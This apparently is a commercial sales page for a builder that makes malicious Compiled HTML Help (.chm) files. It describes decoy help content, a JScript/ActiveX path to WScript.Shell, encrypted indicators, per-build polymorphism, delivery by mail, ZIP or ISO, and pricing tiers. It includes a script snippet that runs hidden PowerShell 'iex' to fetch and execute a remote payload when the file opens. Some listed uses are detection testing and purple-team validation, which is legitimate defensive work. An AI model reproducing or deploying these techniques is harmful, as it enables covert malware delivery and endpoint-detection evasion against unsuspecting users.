A CHM (Compiled HTML Help) file is a Microsoft ITSF-format container holding a compiled set of HTML pages, JScript, CSS, and images. It's opened with hh.exe — a Microsoft-signed viewer that ships with every modern Windows.
Inside the help context, embedded JScript runs with WScript.Shell via htmlfile/ActiveX object instantiation — no need for the user to enable anything. Exploit Builder constructs a CHM whose default-page JScript triggers your payload silently while a credible-looking help topic is shown to the user.
hh.exe — Microsoft-signed, low-suspicion viewerhtmlfile, WScript.Shell) execution pathURL-only. Supply an HTTPS endpoint hosting your payload — the embedded JScript fetches and executes it on open. CHM does not embed binary payloads.
Select decoy topic: software readme, manual excerpt, internal procedure.
Default-page JScript, onload, or shortcut/object hook within the help index.
Builder produces a fully-valid ITSF .chm ready for delivery.
Builder writes a fully spec-compliant ITSF stream: SECTION tables, #SYSTEM, #STRINGS, content listing, LZX-compressed page data.
Pages execute inside the HTML Help engine which uses MSHTML. JScript is permitted; htmlfile ActiveX instantiation gives access to WScript.Shell.
Optional alternative trigger: HTML Help's ShortCut object can launch arbitrary commands. Powerful but easier to detect than the JScript path.
URLs, command names, and decoy text encrypted in the JScript layer; decrypted at runtime so the static .chm binary holds no plain-text IOCs.
Authentic-looking help content (TOC, index, formatted topic body) so the help window looks like real documentation.
Page filenames, JScript variable names, comment layout, and string-table layout differ each build.
<script> var h = new ActiveXObject("htmlfile"); var s = h.parentWindow.ActiveXObject("WScript.Shell"); var u = Dec("...enc...", k); s.Run("cmd /c powershell -nop -w 1 iex(...)", 0, false); </script>
| Output Format | Compiled HTML Help (.chm) — Microsoft ITSF container |
|---|---|
| Delivery Mode | URL only — embedded JScript fetches the payload at runtime. No local-embed mode. |
| OS Compatibility | Windows XP / 7 / 8.1 / 10 / 11 (hh.exe ships by default) |
| Host Process | hh.exe — Microsoft-signed HTML Help viewer |
| Execution Surface | JScript · ActiveX (htmlfile, WScript.Shell) · ShortCut object |
| Triggers | Default-page onload · Body inline · ShortCut element |
| Decoy Topics | Software readme · Manual · Procedure document · Custom HTML |
| Compression | LZX (standard ITSF) |
| Polymorphism | Page names · JScript layout · String tables · Comment injection |
| Recommended Carrier | Direct mail · ZIP · ISO/IMG |
Validate rules around hh.exe spawning network/script children — a relatively low-volume telemetry channel.
Highly effective against environments with legacy software where help files are common and unsuspicious.
Demonstrate that "documentation files" can run code without enable-content prompts.
Test detonation of .chm within varied EDR/sandbox stacks; many under-cover this format.
Reproduce TTPs from APT actors using CHM (notably APT41, Kimsuky, Bitter, SideWinder) for purple-team validation.
Use as a trusted-looking stage opened by an LNK that calls hh.exe directly.
All tiers include unlimited builds, every decoy topic profile, full polymorphism, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
